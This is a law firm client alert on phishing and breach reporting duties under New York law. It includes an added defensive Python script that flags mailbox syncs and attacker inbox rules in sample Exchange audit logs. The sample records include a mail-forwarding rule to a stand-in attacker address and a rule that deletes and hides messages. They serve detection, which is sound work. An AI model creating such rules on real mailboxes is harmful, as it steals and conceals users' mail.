#PhightThePhish – Know the Pond You Are Swimming In!

This week’s theme in the Cybersecurity and Infrastructure Security Agency’s (“CISA”) Cybersecurity Awareness Month is Phight the Phish, a fundamental goal of any organization’s cybersecurity program. Why so fundamental? Phishing, like any kind of user-directed fraud, targets the human first: human strengths or weaknesses (depending on one’s perspective), like trust and a willingness to help. And computer-enabled fraud will never go away, at least as long as humans are using computers. Hence, an organization that does not take user fallibility into account is ignoring one of the biggest, and most addressable, weaknesses pre-installed in its network.

CISA offers a number of resources and services to help organizations Phight the Phish, including free phishing campaign assessments. If there is one thing an organization can do to improve its posture against phishing, it is to raise awareness and empower users through a well-structured phishing campaign. This discussion, however, focuses not on preventing a successful phishing attack, but on limiting the damage a phishing attack can do once it succeeds, because some phishing attacks will always succeed.

To better understand the damage a phishing attack can do, it is imperative to know the pond you—and your attacker—are swimming in. The explosion in data creation, fueled by ever-cheaper storage, has made that pond murky: few organizations understand with any clarity what data they process, where it is stored, and why. Sensitive corporate or personal data is always in places it should not be, always protected less than it should be, and always exposed to a potential phishing attack.

Take, for example, the average employee’s e-mail account. Even a mundane and otherwise inconsequential phishing attack, caught within minutes by the duped user and duly reported to the information security team, can lead to reporting obligations and potential liability if the organization does not fully, or even materially, understand its data processing practices. This is because an employee’s e-mail will inevitably contain reportable personal information. Whether it is a spreadsheet of employee data, a scan of a customer’s driver’s license, a photo of the user’s own credit card or passport, or even of the user’s COVID-19 vaccination card, e-mail is a sponge for sensitive personal data, and one that never seems to be wrung dry.

Add to this the fact that many phishing attacks involve tooling that automatically “syncs,” or copies, part or all of the compromised mailbox to the attacker’s system, and you have a perfect recipe for breach reportability. Case in point: the New York data breach reporting statute, N.Y. Gen. Bus. Law § 899-aa, makes reportable nearly any instance of unauthorized access to or acquisition of what the statute defines as “private information,” i.e., a name or other identifier combined with something more sensitive, such as a Social Security number or driver’s license number. When an attacker syncs a compromised mailbox, the attacker most certainly accesses or acquires that information as defined in § 899-aa. And most e-mail logging is insufficient to prove one way or the other whether a specific e-mail containing private information was synced, because a sync, where it is logged at all, is typically recorded at the folder or mailbox level rather than message by message. Beyond that, when attackers compromise a mailbox, they often go through it manually, creating mailbox rules (for example, to forward incoming messages elsewhere or to hide replies from the user) or otherwise looking for information that can aid the attack. This too can ring the reportability bell under the access or acquisition standard.
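The two behaviours just described, mailbox syncing and inbox-rule creation, leave traces in mailbox audit logs, and the difference between what a sync record proves and what an item-level access record proves is exactly the evidentiary gap the paragraph points to. The script below is an added example, not part of the original LEGALcurrents article: it triages a handful of constructed audit records modelled on Exchange Online mailbox auditing (the operation and parameter names are Exchange’s; the simplified one-object-per-line shape, the sample values and the keyword heuristics are assumptions for illustration) and reports which folders must be presumed acquired in full, which rules look like an attacker’s, and the client IPs involved.

```python
from __future__ import annotations

import json

# Constructed sample records (all values invented). The operation names
# (MailItemsAccessed, New-InboxRule, Set-InboxRule, UpdateInboxRules) and
# the parameter names follow Exchange Online mailbox auditing, but the
# one-JSON-object-per-line shape is a simplifying assumption for this example.
SAMPLE_AUDIT_LOG = r"""
{"CreationTime": "2021-10-12T13:02:11", "Operation": "MailItemsAccessed", "UserId": "jane@example.com", "ClientIP": "203.0.113.7", "OperationProperties": [{"Name": "MailAccessType", "Value": "Bind"}], "Folders": [{"Path": "\\Inbox", "FolderItems": [{"InternetMessageId": "<a1@example.com>"}, {"InternetMessageId": "<a2@example.com>"}]}]}
{"CreationTime": "2021-10-12T13:05:40", "Operation": "MailItemsAccessed", "UserId": "jane@example.com", "ClientIP": "198.51.100.23", "OperationProperties": [{"Name": "MailAccessType", "Value": "Sync"}], "Folders": [{"Path": "\\Inbox"}]}
{"CreationTime": "2021-10-12T13:06:02", "Operation": "MailItemsAccessed", "UserId": "jane@example.com", "ClientIP": "198.51.100.23", "OperationProperties": [{"Name": "MailAccessType", "Value": "Sync"}], "Folders": [{"Path": "\\Sent Items"}]}
{"CreationTime": "2021-10-12T13:09:15", "Operation": "New-InboxRule", "UserId": "jane@example.com", "ClientIP": "198.51.100.23", "Parameters": [{"Name": "Name", "Value": "."}, {"Name": "SubjectContainsWords", "Value": "invoice;password;wire"}, {"Name": "DeleteMessage", "Value": "True"}, {"Name": "MarkAsRead", "Value": "True"}]}
{"CreationTime": "2021-10-12T13:10:01", "Operation": "Set-InboxRule", "UserId": "jane@example.com", "ClientIP": "198.51.100.23", "Parameters": [{"Name": "Name", "Value": "Forward"}, {"Name": "ForwardTo", "Value": "archive@attacker.example"}]}
{"CreationTime": "2021-10-12T14:00:00", "Operation": "New-InboxRule", "UserId": "bob@example.com", "ClientIP": "192.0.2.10", "Parameters": [{"Name": "Name", "Value": "Newsletters"}, {"Name": "FromAddressContainsWords", "Value": "news@"}, {"Name": "MoveToFolder", "Value": "Newsletters"}]}
"""

RULE_OPS = ("New-InboxRule", "Set-InboxRule", "UpdateInboxRules")
EXFIL_PARAMS = ("ForwardTo", "ForwardAsAttachmentTo", "RedirectTo")
# Heuristic (assumption): subjects attackers commonly filter on to hide replies.
RULE_KEYWORDS = ("invoice", "payment", "wire", "password", "phish", "hack")


def parse_audit(text: str) -> list[dict]:
    """One JSON object per line; blank lines are ignored."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def _props(record: dict, key: str) -> dict[str, str]:
    """Flatten a [{"Name": ..., "Value": ...}] list into a plain dict."""
    return {p["Name"]: p["Value"] for p in record.get(key, [])}


def sync_access(records: list[dict]) -> list[dict]:
    """One finding per folder touched by a MailItemsAccessed event.

    A Bind record lists the individual items it opened, so access can be
    narrowed to those messages. A Sync record names only the folder, so every
    item in that folder has to be presumed acquired (provable_items is None).
    """
    findings = []
    for r in records:
        if r.get("Operation") != "MailItemsAccessed":
            continue
        access = _props(r, "OperationProperties").get("MailAccessType")
        for folder in r.get("Folders", []):
            items = [i["InternetMessageId"] for i in folder.get("FolderItems", [])]
            findings.append({
                "time": r["CreationTime"], "user": r["UserId"], "ip": r["ClientIP"],
                "folder": folder.get("Path"), "access": access,
                "provable_items": items if access == "Bind" else None,
            })
    return findings


def suspicious_rules(records: list[dict]) -> list[dict]:
    """Flag inbox-rule changes that forward, delete, or hide mail."""
    findings = []
    for r in records:
        if r.get("Operation") not in RULE_OPS:
            continue
        params = _props(r, "Parameters")
        reasons = []
        if any(p in params for p in EXFIL_PARAMS):
            reasons.append("forwards mail outside the mailbox")
        if params.get("DeleteMessage") == "True":
            reasons.append("deletes matching mail")
        if not params.get("Name", "").strip(". _-"):
            reasons.append("rule name is empty or punctuation only")
        subject = params.get("SubjectContainsWords", "").lower()
        if any(k in subject for k in RULE_KEYWORDS):
            reasons.append("filters on keywords attackers commonly hide")
        if reasons:
            findings.append({"time": r["CreationTime"], "user": r["UserId"],
                             "ip": r["ClientIP"], "name": params.get("Name", ""),
                             "reasons": reasons})
    return findings


def triage(text: str) -> dict:
    """Summarise what the log proves and what it cannot narrow down."""
    records = parse_audit(text)
    syncs = [f for f in sync_access(records) if f["provable_items"] is None]
    rules = suspicious_rules(records)
    return {
        "presumed_acquired_folders": sorted({(f["user"], f["folder"]) for f in syncs}),
        "suspicious_rules": rules,
        "attacker_ips": sorted({f["ip"] for f in syncs} | {r["ip"] for r in rules}),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_AUDIT_LOG).items():
        print(key)
        for item in value:
            print("   ", item)
```

Against the constructed records, the script reports that Jane’s Inbox and Sent Items must be presumed acquired in full (the Sync events name the folders, not the messages), flags her two rules but not Bob’s ordinary newsletter filter, and isolates the single client IP behind both the sync and the rule changes. Whether a real export contains enough detail to narrow a sync to specific messages is precisely the question counsel will ask, so the `provable_items` distinction is the part worth carrying into any real investigation.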

Why should an organization care if the compromise of a single e-mail account becomes reportable? First, it is every organization’s legal duty—at least in relation to the private information of a New Yorker under the N.Y. SHIELD Act, N.Y. Gen. Bus. Law § 899-bb—to adequately and reasonably protect private information. Second, the costs and disruption arising from a reportable phishing attack can vastly outstrip the cost of the attack itself, which is often negligible if caught in time. Third, more and more reported breaches are becoming public record, with several state attorneys general publishing reporting letters online. Fourth, for those organizations looking to purchase or renew cyber liability insurance, a reportable breach can lead to increased premiums and decreased coverage.

To address these risks, a little filtration can go a long way. User education is the best initial filter to apply, helping remove some of the reportable information from your e-mail environment. Mailbox size restrictions, automatic archiving, and data retention and destruction policies are low-tech tools that immediately reduce the exposure from a future phishing attack. It is true that most phishing attacks are not interested in the personal data contained within corporate e-mail accounts; the syncing happens automatically because of the tooling the attacker uses. That, however, does not reduce the risk of reportability, or the need for a little preventive maintenance on your e-mail pond.

So, as we all continue to #PhightThePhish, remember that some of your users will invariably take the bait. No anti-phishing program, however well-intentioned, will truly be comprehensive if you merely tread water and underestimate the attacker’s potential for success.

If you have any questions regarding this LEGALcurrents, please contact any member of the Privacy and Data Security group at 585.232.6500 or 716.853.1616.

Attorney Advertising. Prior results do not guarantee a similar outcome. This publication is provided as a service to clients and friends of Harter Secrest & Emery LLP. It is intended for general information purposes only and should not be considered as legal advice. The contents are neither an exhaustive discussion nor do they purport to cover all developments in the area. The reader should consult with legal counsel to determine how applicable laws relate to specific situations. ©2021 Harter Secrest & Emery LLP